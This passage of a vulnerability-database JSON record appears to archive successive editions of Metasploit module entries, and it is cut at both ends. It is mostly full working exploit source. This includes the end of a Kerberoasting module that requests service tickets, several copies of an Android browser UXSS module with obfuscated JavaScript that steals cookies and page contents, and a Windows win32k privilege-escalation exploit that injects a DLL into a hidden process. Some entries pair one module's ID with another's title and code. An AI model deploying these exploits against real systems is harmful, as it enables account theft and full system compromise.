lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif attribute['type'] == 'servicePrincipalName':\n for spn in attribute['vals']:\n SPNs.append(str(spn))\n\n if mustCommit is True:\n if int(userAccountControl) & UF_ACCOUNTDISABLE:\n module.log('Bypassing disabled account {}'.format(sAMAccountName), level='debug')\n else:\n for spn in SPNs:\n answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])\n except Exception, e:\n module.log('Skipping item, cannot process due to error', level='error')\n\n if len(answers)>0:\n self.printTable(answers, header=[\"ServicePrincipalName\", \"Name\", \"MemberOf\", \"PasswordLastSet\", \"LastLogon\"])\n\n if self.__requestTGS is True:\n # Let's get unique user names and a SPN to request a TGS for\n users = dict( (vals[1], vals[0]) for vals in answers)\n\n # Get a TGT for the current user\n TGT = self.getTGT()\n for user, SPN in users.iteritems():\n try:\n serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,\n self.__kdcHost,\n TGT['KDC_REP'], TGT['cipher'],\n TGT['sessionKey'])\n self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN)\n except Exception , e:\n module.log('SPN Exception: {} - {}'.format(SPN, str(e)), level='error')\n\n else:\n module.log('No entries found!', level='info')\n\n\ndef run(args):\n if dependencies_missing:\n module.log('Module dependencies (impacket, pyasn1, pyOpenSSL) missing, cannot continue', level='error')\n return\n\n options = {}\n options['dc_ip'] = args['rhost']\n executer = GetUserSPNs(args['user'], args['pass'], args['domain'], options)\n executer.run()\n\nif __name__ == '__main__':\n module.run(metadata, run)\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-08T22:26:07", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 
71}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-09T00:24:11", "history": [], "viewCount": 72, "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2019-06-09T00:24:11"}, "dependencies": {"references": [{"type": "talosblog", "idList": ["TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8"]}, {"type": "threatpost", "idList": ["THREATPOST:BDEA819E4532E0D1FA016778F659F7E8"]}, {"type": "thn", "idList": ["THN:1BA2E3EE721856ECEE43B825656909B0"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891815", "OPENVAS:1361412562310852544", "OPENVAS:1361412562310876460", "OPENVAS:1361412562310844043", "OPENVAS:1361412562310704456", "OPENVAS:1361412562310891814", "OPENVAS:1361412562310876458", "OPENVAS:1361412562310876462", "OPENVAS:1361412562310876461", "OPENVAS:1361412562310876463"]}, {"type": "zdt", "idList": ["1337DAY-ID-32847"]}], "modified": 
"2019-06-09T00:24:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target 
URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good 
\"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-09T00:24:11", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 72}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "309300c36aeb6881690130ab30ee1014", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows TrackPopupMenu Win32k NULL Pointer Dereference", "description": "This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. 
Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.\n", "published": "2014-10-23T23:51:30", "modified": "2018-10-28T00:54:14", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4113", "http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/"], "cvelist": ["CVE-2014-4113"], "lastseen": "2019-06-13T16:39:59", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 8.4, "vector": "NONE", "modified": "2019-06-13T16:39:59"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2014-4113"]}, {"type": "seebug", "idList": ["SSV:90702", "SSV:87348"]}, {"type": "symantec", "idList": ["SMNTC-70364"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131964", "PACKETSTORM:128861", "PACKETSTORM:149689", "PACKETSTORM:151182"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/LOCAL/MS14_058_TRACK_POPUP_MENU", "MSF:EXPLOIT/MULTI/HTTP/OPMANAGER_SOCIALIT_FILE_UPLOAD", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION_JUICY", "MSF:EXPLOIT/WINDOWS/LOCAL/MS16_075_REFLECTION"]}, {"type": "exploitdb", "idList": ["EDB-ID:46945", "EDB-ID:39666", "EDB-ID:35101", "EDB-ID:37064", "EDB-ID:42556", "EDB-ID:45562"]}, {"type": "thn", "idList": ["THN:2A7DE929E5909B366E6F490ABBF0A6C1", "THN:675EE08758C0AD2D11F9BC33AB15EA32", "THN:083E49FCE8774369B5F2FAEDBE3F18A3"]}, {"type": "zdt", "idList": ["1337DAY-ID-32825", "1337DAY-ID-23642", "1337DAY-ID-22805", "1337DAY-ID-25556"]}, {"type": "threatpost", "idList": ["THREATPOST:720727931BBA026660C91151A9F50C2F", "THREATPOST:6D624865424D6B497F552030FAE6A7EE", "THREATPOST:2DE43487E2CDBEABD59D64B1DC7CE12C", "THREATPOST:6FD1BE58563D8C80AD13206713C5B06D"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783863"]}, {"type": "nessus", "idList": ["SMB_NT_MS14-058.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310804859"]}, {"type": 
"securityvulns", "idList": ["SECURITYVULNS:VULN:14016"]}, {"type": "kaspersky", "idList": ["KLA10601"]}], "modified": "2019-06-13T16:39:59"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/ms14_058_track_popup_menu.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/post/windows/reflective_dll_injection'\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = NormalRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::FileInfo\n include Msf::Post::Windows::ReflectiveDLLInjection\n\n def initialize(info={})\n super(update_info(info, {\n 'Name' => 'Windows TrackPopupMenu Win32k NULL Pointer Dereference',\n 'Description' => %q{\n This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability\n can be triggered through the use of TrackPopupMenu. Under special conditions, the\n NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary\n code execution. This module has been tested successfully on Windows XP SP3, Windows\n 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. 
Also on Windows 7 SP1 and Windows\n 2008 R2 SP1 64 bits.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # vulnerability discovery and exploit in the wild\n 'juan vazquez', # msf module (x86 target)\n 'Spencer McIntyre', # msf module (x64 target)\n 'OJ Reeves <oj[at]buffered.io>'\n ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Targets' =>\n [\n # Tested on (32 bits):\n # * Windows XP SP3\n # * Windows 2003 SP2\n # * Windows 7 SP1\n # * Windows 2008\n [ 'Windows x86', { 'Arch' => ARCH_X86 } ],\n # Tested on (64 bits):\n # * Windows 7 SP1\n # * Windows 2008 R2 SP1\n [ 'Windows x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' =>\n {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'References' =>\n [\n ['CVE', '2014-4113'],\n ['OSVDB', '113167'],\n ['BID', '70364'],\n ['MSB', 'MS14-058'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/an-analysis-of-a-windows-kernel-mode-vulnerability-cve-2014-4113/']\n ],\n 'DisclosureDate' => 'Oct 14 2014',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n },\n }))\n end\n\n def check\n os = sysinfo[\"OS\"]\n\n if os !~ /windows/i\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n if sysinfo[\"Architecture\"] =~ /(wow|x)64/i\n arch = ARCH_X64\n elsif sysinfo[\"Architecture\"] == ARCH_X86\n arch = ARCH_X86\n end\n\n file_path = expand_path(\"%windir%\") << \"\\\\system32\\\\win32k.sys\"\n major, minor, build, revision, branch = file_version(file_path)\n vprint_status(\"win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}\")\n\n # Neither target suports Windows 8 or 8.1\n return Exploit::CheckCode::Safe if build == 9200\n return Exploit::CheckCode::Safe if build == 9600\n\n return Exploit::CheckCode::Appears if [2600, 3790, 7600, 7601].include?(build)\n\n return 
Exploit::CheckCode::Unknown\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if check == Exploit::CheckCode::Safe\n fail_with(Failure::NotVulnerable, \"Exploit not available on this system.\")\n end\n\n if sysinfo[\"Architecture\"] =~ /wow64/i\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n print_status('Launching notepad to host the exploit...')\n notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})\n begin\n process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)\n print_good(\"Process #{process.pid} launched.\")\n rescue Rex::Post::Meterpreter::RequestError\n # Reader Sandbox won't allow to create a new process:\n # stdapi_sys_process_execute: Operation failed: Access is denied.\n print_error('Operation failed. Trying to elevate the current process...')\n process = client.sys.process.open\n end\n\n print_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\")\n if target.arch.first == ARCH_X86\n dll_file_name = 'cve-2014-4113.x86.dll'\n else\n dll_file_name = 'cve-2014-4113.x64.dll'\n end\n\n library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-4113', dll_file_name)\n library_path = ::File.expand_path(library_path)\n\n print_status(\"Injecting exploit into #{process.pid}...\")\n exploit_mem, offset = inject_dll_into_process(process, library_path)\n\n print_status(\"Exploit injected. 
Injecting payload into #{process.pid}...\")\n payload_mem = inject_into_process(process, payload.encoded)\n\n # invoke the exploit, passing in the address of the payload that\n # we want invoked on successful exploitation.\n print_status('Payload injected. Executing exploit...')\n process.thread.create(exploit_mem + offset, payload_mem)\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-13T16:39:59", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 73}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. 
Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-14T04:40:32", "history": [], "viewCount": 72, "enchantments": {"score": {"value": -0.2, "vector": "NONE", "modified": "2019-06-14T04:40:32"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891816", "OPENVAS:1361412562310891817", "OPENVAS:1361412562310883064", "OPENVAS:1361412562310883062", "OPENVAS:1361412562310852553", "OPENVAS:1361412562310883063", "OPENVAS:1361412562310852552", "OPENVAS:1361412562310844048", "OPENVAS:1361412562310852551", "OPENVAS:1361412562310844046"]}, {"type": "talosblog", "idList": ["TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8"]}], "modified": "2019-06-14T04:40:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps 
running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = 
function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n document.body.appendChild(obj);\n });\n\n window.addEventListener('message', function(e) {\n var data = JSON.parse(e.data);\n var x = new XMLHttpRequest;\n x.open('POST', window.location, true);\n x.send(e.data);\n }, false);\n\n EOS\n\n html = <<-EOS\n <html>\n <body>\n <script>\n #{script}\n </script>\n </body>\n </html>\n EOS\n\n print_status(\"Sending initial HTML ...\")\n send_response_html(cli, html)\n end\n end\n\n def collect_data(request)\n begin\n response = JSON.parse(request.body)\n rescue JSON::ParserError\n print_error \"Invalid JSON request.\"\n else\n url = response['url']\n if response && url\n file = store_loot(\"android.client\", \"text/plain\", cli.peerhost, request.body, \"aosp_uxss_#{url}\", \"Data pilfered from uxss\")\n print_good \"Collected data from URL: #{url}\"\n print_good \"Saved to: #{file}\"\n end\n end\n end\n\n def custom_js\n rjs_hook + datastore['CUSTOM_JS']\n end\n\n def rjs_hook\n remote_js = datastore['REMOTE_JS']\n if remote_js.present?\n \"var s = document.createElement('script');s.setAttribute('src', '#{remote_js}');document.body.appendChild(s); \"\n else\n ''\n end\n end\n\n def run\n exploit\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-14T04:40:32", "differentElements": ["sourceData"], "edition": 74}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "66526d54b1c2468cc1565418836e346e", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability 
present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-16T03:08:17", "history": [], "viewCount": 72, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-06-16T03:08:17"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876491", "OPENVAS:1361412562310876483", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876481", "OPENVAS:1361412562310876488", "OPENVAS:1361412562310876482", "OPENVAS:1361412562310876480", "OPENVAS:1361412562310876489", "OPENVAS:1361412562310876490", "OPENVAS:1361412562310876487"]}, {"type": "mozilla", "idList": ["MFSA2019-17"]}], "modified": "2019-06-16T03:08:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-16T03:08:17", "differentElements": 
["sourceData"], "edition": 75}, {"bulletin": {"id": "MSF:AUXILIARY/GATHER/ANDROID_OBJECT_TAG_WEBVIEW_UXSS", "hash": "db76ae0fa338dee6799587fb9bf8ebf6", "type": "metasploit", "bulletinFamily": "exploit", "title": "Android Open Source Platform (AOSP) Browser UXSS", "description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in all versions of Android's open source stock browser before 4.4, and Android apps running on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug to scrape both cookie data and page contents from a vulnerable browser window. Target URLs that use X-Frame-Options can not be exploited with this vulnerability. Some sample UXSS scripts are provided in data/exploits/uxss.\n", "published": "2014-10-30T15:34:14", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html", "https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef", "http://trac.webkit.org/changeset/96826"], "cvelist": [], "lastseen": "2019-06-16T13:39:27", "history": [], "viewCount": 72, "enchantments": {"score": {"value": -1.0, "vector": "NONE", "modified": "2019-06-16T13:39:27"}, "dependencies": {"references": [{"type": "freebsd", "idList": ["82C07DFA-9016-11E9-AF2F-712C38AA3E4C"]}, {"type": "threatpost", "idList": ["THREATPOST:1BBD92583C879148DB007D70752729A6"]}, {"type": "zdt", "idList": ["1337DAY-ID-32865", "1337DAY-ID-32866"]}, {"type": "xen", "idList": ["XSA-295"]}, {"type": "kitploit", "idList": ["KITPLOIT:2814971718646835741"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876483", "OPENVAS:1361412562310876491", "OPENVAS:1361412562310876485", "OPENVAS:1361412562310876482", "OPENVAS:1361412562310876489", "OPENVAS:1361412562310876481", "OPENVAS:1361412562310876488", "OPENVAS:1361412562310876480", 
"OPENVAS:1361412562310876487", "OPENVAS:1361412562310876479"]}, {"type": "mozilla", "idList": ["MFSA2019-17"]}], "modified": "2019-06-16T13:39:27"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/android_object_tag_webview_uxss.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::JSObfu\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Android Open Source Platform (AOSP) Browser UXSS',\n 'Description' => %q{\n This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.\n },\n 'Author' => [\n 'Rafay Baloch', # Original discovery, disclosure\n 'joev' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'WebServer' ]\n ],\n 'PassiveActions' => [\n 'WebServer'\n ],\n 'References' => [\n [ 'URL', 'http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html'],\n [ 'URL', 'https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef' ],\n [ 'URL', 'http://trac.webkit.org/changeset/96826' ]\n ],\n 'DefaultAction' => 'WebServer',\n 'DisclosureDate' => \"Oct 4 2014\"\n ))\n\n register_options([\n OptString.new('TARGET_URLS', [\n true,\n \"The comma-separated list of URLs to steal.\",\n 
'http://example.com'\n ]),\n OptString.new('CUSTOM_JS', [\n false,\n \"A string of javascript to execute in the context of the target URLs.\",\n ''\n ]),\n OptString.new('REMOTE_JS', [\n false,\n \"A URL to inject into a script tag in the context of the target URLs.\",\n ''\n ])\n ])\n end\n\n def on_request_uri(cli, request)\n print_status(\"Request '#{request.method} #{request.uri}'\")\n\n if request.method.downcase == 'post'\n collect_data(request)\n send_response_html(cli, '')\n else\n payload_fn = Rex::Text.rand_text_alphanumeric(4+rand(8))\n domains = datastore['TARGET_URLS'].split(',')\n\n script = js_obfuscate <<-EOS\n var targets = JSON.parse(atob(\"#{Rex::Text.encode_base64(JSON.generate(domains))}\"));\n targets.forEach(function(target, i){\n var obj = document.createElement('object');\n obj.setAttribute('data', target);\n obj.setAttribute('style', 'position:absolute;left:-9999px;top:-9999px;height:1px;width:1px');\n obj.onload = function() {\n obj.data = 'javascript:if(document&&document.body){(opener||top).postMessage('+\n 'JSON.stringify({cookie:document.cookie,url:location.href,body:document.body.innerH'+\n 'TML,i:'+(i||0)+'}),\"*\");eval(atob(\"#{Rex::Text.encode_base64(custom_js)}\"'+\n '));}void(0);';\n obj.innerHTML = '#{Rex::Text.rand_text_alphanumeric(rand(12)+5)}';\n };\n 